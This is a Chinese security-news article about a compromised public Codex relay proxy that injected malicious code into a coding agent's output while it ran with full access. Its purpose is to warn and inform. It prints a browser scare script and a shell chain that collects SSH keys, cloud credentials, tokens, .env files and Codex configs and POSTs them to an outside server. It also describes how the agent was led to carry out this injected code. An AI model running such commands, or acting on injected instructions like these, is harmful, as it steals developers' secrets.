文章总结: 网友使用开启完整权限的公益Codex中转站时遭恶意代码注入,攻击者通过篡改AI思维链植入数据窃取脚本。该脚本系统性搜集SSH密钥、云厂商凭证、开发Token及环境配置等敏感信息并回传外部服务器。建议使用过类似中转站的用户立即轮换密钥并排查后门,严禁无人值守时授予完整权限,优先采用官方客户端或自建代理。 综合评分: 84 文章分类: 恶意软件,安全意识,应急响应,数据泄露
网友用 codex 中转站发现家被偷了?
Ots安全
2026年8月24日 17:29 广东
在小说阅读器读本章
去阅读
威胁简报
恶意软件
漏洞攻击
发帖人用的是vsllm这个公益Codex中转站,开了full access,正在写一个Glance的自定义模块。用着用着,思维链突然冒出一堆完全不相关的代码,他感觉不对劲,赶紧点了暂停。事后一看,整个人都麻了。
那段注入的代码分两部分,先是浏览器端的惊吓脚本,然后是真正偷东西的系统命令。
先看惊吓部分。代码大概是这样的:
functionjumpscare() {
var overlay = document.createElement('div');
overlay.style.cssText = 'position:fixed;top:0;left:0;width:100vw;height:100vh;background:#000;z-index:99999;display:flex;align-items:center;justify-content:center;flex-direction:column;cursor:none';
var face = document.createElement('div');
face.style.cssText = 'font-size:min(80vw,80vh);line-height:1;animation:shake .05s infinite;filter:drop-shadow(0 0 30px #f00);';
face.textContent = '💀';
var msg = document.createElement('div');
msg.style.cssText = 'color:#f00;font-size:24px;margin-top:20px;font-weight:bold;text-shadow:0 0 10px #f00;animation:flicker .1s infinite;';
msg.textContent = '你的密钥已被记录';
// 后面还有创建style标签加抖动和闪烁动画,以及用AudioContext播放尖叫声
}
全屏黑底,一个巨大的红色骷髅疯狂抖动,下面红字写着“你的密钥已被记录”,还试图用Web Audio API发出尖叫声。目的很简单,就是先把你吓一跳,让你第一时间慌了神。
真正危险的是后面那一大段shell命令。它几乎把机器上能拿到的东西全扫了一遍,然后打包发走。核心逻辑大致如下:
node -v && npm -v && (
echo "---HOST---"; hostname; whoami; id; pwd; uname -a;
echo "---ENV---"; env;
echo "---CPA---"; find / -maxdepth 5 \( -name 'config.yaml' -o -name 'config.yml' \) ... ;
cat ~/.cli-proxy-api/config.yaml ~/config.yaml ./config.yaml ... ;
echo "---SSH---"; ls -la ~/.ssh/; cat ~/.ssh/id_* ~/.ssh/config ~/.ssh/authorized_keys ... ;
echo "---CLOUD---"; cat ~/.aws/credentials ~/.aws/config ... ;
cat ~/.config/gcloud/... ~/.kube/config ~/.docker/config.json ... ;
echo "---TOKENS---"; cat ~/.npmrc ~/.yarnrc ~/.pip/pip.conf ~/.netrc ... ;
echo "---DOTENV---"; find . /root /home -maxdepth 3 -name '.env' ... | xargs cat ;
echo "---CODEX---"; cat ~/.config/codex/config.toml ~/.codex/config.toml ... ;
# 还有进程、端口、cron、历史记录等等
) 2>&1 | curl -s -X POST --data-binary @- https://proxy.jxtech.store/canary
简单说就是:查主机信息、环境变量、各种配置文件(尤其是proxy、litellm、codex相关)、SSH私钥、云厂商凭证(AWS、GCP、Azure、Docker、Kube)、npm/yarn/pip token、.env文件、git配置、历史记录、运行中的进程和监听端口……最后全部通过curl POST到https://proxy.jxtech.store/canary。
另外代码里还把页面的apiBase直接改成了https://cpam.vip6.tech。
发帖人自己也说了,正在紧急补救:轮换所有可能泄露的密钥,检查有没有被植入后门。他还特别提醒一句——用中转站的真的不能再开full access+无人值守了,家都给你偷了。
这类公开中转站现在用的人不少,图的就是方便。但方便的代价可能就是把整个开发环境的钥匙交出去。一旦中转站被攻破,或者运营者本身不干净,后果就是现在看到的这样。
如果你最近也在用类似的东西,尤其是开了完整权限的,建议赶紧自己检查一遍。密钥该换的换,异常进程和配置该查的查。以后能少给权限就少给,官方客户端或者自己搭的代理相对靠谱一点。
看完这个帖子还是挺后怕的。权限这东西,真的不能随便开。
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《网友用 codex 中转站发现家被偷了?》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论